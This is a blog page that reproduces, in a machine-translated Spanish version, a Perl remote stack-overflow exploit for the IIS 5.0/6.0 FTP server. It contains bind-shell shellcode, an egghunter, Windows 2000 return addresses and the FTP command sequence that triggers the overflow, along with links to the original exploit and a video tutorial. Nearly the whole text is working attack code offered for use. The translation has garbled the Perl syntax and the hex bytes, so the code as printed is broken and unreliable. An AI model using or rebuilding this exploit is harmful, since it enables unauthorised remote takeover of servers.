Microsoft IIS 5.0/6.0 servidor FTP remoto de desbordamiento de pila Exploit (win2k): "
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143
| #! / Usr / bin / perl # IIS 5.0 Servidor FTP / sistemas remotos explotar # De Win2k SP4 objetivos bug # encontrado y explotado por Kingcope, kcope2 <at> googlemail.com # Afecta IIS6 con pila de protección de cookie # Modded por muts, egghunter añadido adicional para ampliar la carga secundaria # ¿Podría tomar un minuto o dos para que el huevo se encuentra. # Abre una shell se unen en el puerto 4444
http://www.offensive-security.com/0day/msftp.pl.txt #
IO uso:: Socket; $ | = 1; sc = "\ x 89 \ x e2 \ x dd x \ c5 \ x d9 \ x 72 x \ f4 \ x 5f \ x 57 \ $ x 59 \ x 49 \ x 49 \ x 49 \ x 49 \ x 43" . "\ X 43 \ x 43 \ x 43 \ x 43 \ x 43 \ x 51 \ x 5 bis \ x 56 \ x 54 \ x 58 x \ 33 \ 30 x \ x 56 \ x 58 \ x 34". "\ X 41 x \ 50 \ 30 x \ x 41 x \ 33 \ x 48 \ x 48 \ x 30 \ x 41 \ x 30 \ x 30 \ x 41 \ x 42 \ x 41 \ x 41". "\ X 42 \ x 54 \ x 41 \ x 41 \ x 51 x \ 32 \ 41 x \ x 42 x \ 32 \ x 42 \ x 42 \ x 30 \ x 42 \ x 42 \ x 58". "\ X 50 \ x 38 \ x 41 \ x 43 \ x 4 bis \ x 4 bis \ x 49 \ x 45 \ x 36 \ x 4d \ x 51 \ x 48 \ x 4 bis \ x 4 ter \ x 4f". "\ X 44 x \ 4f \ x 47 x \ 32 \ 46 x \ x 32 \ x 42 \ x 4 bis \ x 43 x \ 32 \ 46 x \ x 38 \ x 48 \ x 4d \ x 46". "\ X 4e \ x 47 \ 4c x \ x 45 \ x 55 \ x 51 \ x 4 bis \ x 44 \ x 34 \ x 4 bis \ 4f x \ x 48 \ x 38 \ x 46 \ x 34". "\ X 50 x \ 30 \ 46 x \ x 50 \ x 50 \ x 57 \ 4c x \ x 4 ter \ x 4 ter \ x 4 bis \ 4e x \ x 4f \ x 44 x \ 35 \ x 4 bis". "\ X 4 bis \ 4e x \ x 4f \ x 43 \ x 45 \ x 4 ter \ x 57 \ x 4 ter \ 4f x \ x 4d \ x 37 \ x 41 \ x 41"; #. / Ventanas msfpayload / shell_bind_tcp R |. / Msfencode-e x86/shikata_ga_nai-b "\ x00 x0a \ \ x0d"
shell $ = "T00WT00W". "\ x \ x da de \ x bd \ x 2d \ e7 x \ x 9 ter \ x 9f \ x 2b \ c9 x \ x b1 \ x 56 \ x d9 \ x 74 \" x 24 " \ f4 x ". "\ X 5 bis \ x 83 \ / u. x \ fc \ x 31 x \ x 6 bis \ x 15 x \ 03 \ x 6 bis \ x 15 \ x cf \ x 12 \ x 67 \ x 77 \ x 86". "\ Dd \ x 98 x \ x 88 \ x f8 \ x 54 \ x 7 D \ x b9 \ x 2a \ x 02 x \ f5 \ e8 x \ x fa \ x 40 \ x 5b \ x 01". "\ X 71 \ x 04 \ x 48 \ x 92 x \ f7 \ x 81 \ x 7f \ x 13 \ x \ bd f7 x \ x 4e \ x a4 \ x 70 \ x 38 \ x 1c". "\ X 66 \ x 13 \ x c4 \ x 5f \ x \ x bb f3 \ f5 x \ x \ af ce x \ x f2 \ x 32 \ x \ x 21 cd \ x a6 \ x" e ter. "\ X 99 x \ 90 \ x 56 \ x 9f \ cc x \ x 28 \ x 57 x \ 4f \ 6b x \ x 10 \ x 2 septies \ / u. x \ ca \ x x e5 \ x 85". "\ F5 x \ x fc \ x 56 \ x 92 \ x ser \ x e4 \ x \ dd x fc x \ 1e \ x 14 \ x 31 \ x 1F \ x 62 \ x 5f \ x 3e". "X x \ eb 10 \ x 5e \ x 96 x \ 22 \ x d8 \ x 50 \ x d6 \ e8 x \ x e7 \ 5c x \ x db \ \ f1 x \ x 20 \ x 5 bis". "\ X 04 \ x 84 \ x 5 bis \ x 98 \ x b9 \ x 9e \ x 98 \ x e2 \ x 65 \ x 2b \ x 3d \ x 44 \ x \ ed x 8 B \ x e5". "\ X 74 x \ 22 \ x 4d \ x 6d \ x 7 \ x 8f \ x 1a \ x 29 \ x 9f \ x 0e \ cf x \ x 41 \ x 9 ter \ x 9 ter \ x" ee. "\ X 85 \ x 2d \ x df \ d4 x \ x 01 \ x 75 \ x \ bb x 75 \ x 13 \ x d3 \ x 6 bis \ x 8 \ x 43 \ x \ bb x d3". "\ 2e x \ x 0f \ 2e x \ x 07 \ x 48 x \ 52 \ x 27 \ x e4 \ x 66 \ x 6d \ b7 x \ x 62 \ f1 x \ x 1e \ x 85". "\ X 2d \ a9 x \ 88 x \ x a5 \ x a6 \ x 77 \ x 4e \ c9 x \ 9 quater, x \ x cf \ x c0 \ x 34 \ x 1F \ x 2 septies \ x c8". "\ X f2 \ x 4 ter \ x 7f \ x 62 x \ d2 \ f3 x \ x 14 \ x 72 \ x \ db x 21 \ x ba \ x 22 \ x 73 \ x 9 \ x 7". "\ X 93 x \ 33 \ x 4 bis \ x 12 \ x f9 \ x \ x bb b5 \ x 02 \ x 02 \" x 16 \ x c0 \ x 05 x \ cc \ x 42 \ x 80 ". "\ X e1 \ x 2d \ x 75 \ x 36 \ x ad \ x b8 \ x 93 x \ 52 \ x 5d \ x \ x 0c ed \ x \ x ter 9f \ x ca \ x 84". "\ X 6c \ x e0 \ x 38 \ x b9 \ x 25 \ x 76 \ x 74 \ x d7 \ x f2 \ x 79 \ x 85 \ x \ fd x 50 \ x d6 \ x 2d". "\ X 96 x \ 22 \ x 34 \ / u. x \ x 87 \ x 34 x \ 11 \ x 5 bis \ c1 x \ x 0c \ f1 x \ x 10 \ x \ bf x df \ x 60". "\ X 24 \ / u. x \ x 88 x \ 01 \ x b7 \ x 71 \ x 49 \ 4c x \ x a4 \ x 2d \ x 1e \ x 19 \ x 1a \ x 24 \ x ca". "\ X b7 \ x 05 \ x 9e \ x e9 \ x 4 bis \ x d3 \ x d9 \ aa x \ x 90 \" x 20 \ e7 x \ x 33 \ x 55 \ x 1c \ x c3 ". "\ X 23 \ x a3 \ x 9d \ 4f x \ x 10 \ x 7b \ c8 x \ x 19 x \ ce \ x \ 3d x a2 \ eb x \ x b8 \ x 97 \ x 19". "A2 x \ x 2c \ 6e x \ x 52 \ x 75 \ x 2b \ x 6f \ x \ bf x 03 \ x d3 \ c1 x \ x 16 x \ 52 \ eb x x \ ed \". "\ X fe \ x 52 \ x 94 x \ 10 \ x 9f \ x 9d \ 4f x \ x 91 \ x \ bf x \ x 5 bis 7f \ ef x \ x 57 \ x 26 \ x 0f". "\ X 52 \ x 3 bis \ x d9 \ x e5 \ x 90 \ x 43 \ x 5 bis \ 0c x \ x 68 \ b0 x \ x 42 \ x 65 \ x 6d \ x fc \ x c4". "\ X 95 \ x 1F \ x 6d \ x a1 \ x 99 \ x 8 C \ x 8e \ x e0 \ x 90";
print "IIS 5.0 FTPd / r00t remoto explotar por V1.2 kcope \ n"; if ($ # ARGV ne 1) ( print "Uso: <target> iiz5.pl <su ip> \ n local"; salida (0); ) srand (time ()); $ Puerto = int (rand (31,337 a 1022)) + 1025; locip $ = $ ARGV [1]; locip $ = ~ s / \. /, / gi; if (tenedor ()) ( calcetín $ = IO:: Socket:: INET -> new (PeerAddr => $ ARGV [0], PeerPort => "21", Proto = 'tcp>'); parche $ = "\ x 7E \ x F1 \ x \ x FA 7F"; # $ RetAddr = "\ x9B \ xB1 \ X4 \ X77"; # JMP ESP univ el 2 de win2k SP4 plataformas RetAddr $ = "\ \ 7B x x 30 \ x E4 \ x 77"; # JMP ESP univ el 2 de win2k SP4 + + de continuación con todos los parches
$ v = "KSEXY". $ sc. "V" x (500 - Longitud ($ sc) - 5); # Dirección superior del marco de pila donde reside shellcode, está codificada dentro de este bloque $ Findsc = "\ x B8 \ x 55 \ x 55 x \ 52 \ x 55 x \ 35 \ x 55 \ x 55 \ x 55 \ x 55 x \ 40 \ x 81 \ x 38 \ x 53" . "\ X 45 \ x 58 \ x 59 \ x 75 \ x F7 \ x 40 x \ 40 \ x 40 x \ 40 \ x \ FF FF x \ x E0";
# ataque de amortiguamiento c = $ findsc. "C". ($ patch x (76 / 4)). $ $ patch. $ patch. ($ Patch x (52 / 4)). $ Patch. "EEEE $ RetAddr". $ Patch. "HHHHIIII". $ parche ". JKKK". "\ E9 x \ x 63 \ x FE \ FF x \ x FF \ FF x \ x FF". "NNNN"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "USUARIO anonimoos \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PASS $ shell \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "USUARIO anonimoos \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PASS $ shell \ r \ n"; $ X = <> $ calcetín; print $ x;
$ Calcetín de impresión "USER \ anónima r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "PASS \ anónima r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "w00t MKD $ port \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; # Almacenamos shellcode en memoria de proceso (de pila) $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "SITIO $ v \ r \ n"; $ X = <> $ calcetín; print $ x; print $ calcetín "CWD w00t $ port \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "MKD CCC". "$ C \ r \ n"; $ X = <> $ calcetín; print $ x; $ Calcetín de impresión "PUERTO $ locip". Int ($ portuaria / 256). "". Int ($% puerto 256). "\ R \ n"; $ X = <> $ calcetín; print $ x; # TRIGGER print $ calcetín "NLST $ c */../ * C / r \ \ n"; $ X = <> $ calcetín; print $ x; while (1) () Else () my $ servsock = IO:: Socket:: INET -> new (localaddr => "0.0.0.0", LocalPort => $ puerto, => 'proto tcp', Escuche => 1); die "No se pudo crear el socket: $! \ n" a menos que $ servsock; mi new_sock $ = $ -> aceptar servsock (); while (<$ new_sock>) ( print $ _; ) cierre ($ servsock); ) Cheerio # # # Kingcope |
代码地址: http://www.offensive-security.com/0day/msftp.pl.txt
利用教程: http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/microsoft-ftp-server-remote-exploit_controller.swf

"
No hay comentarios:
Publicar un comentario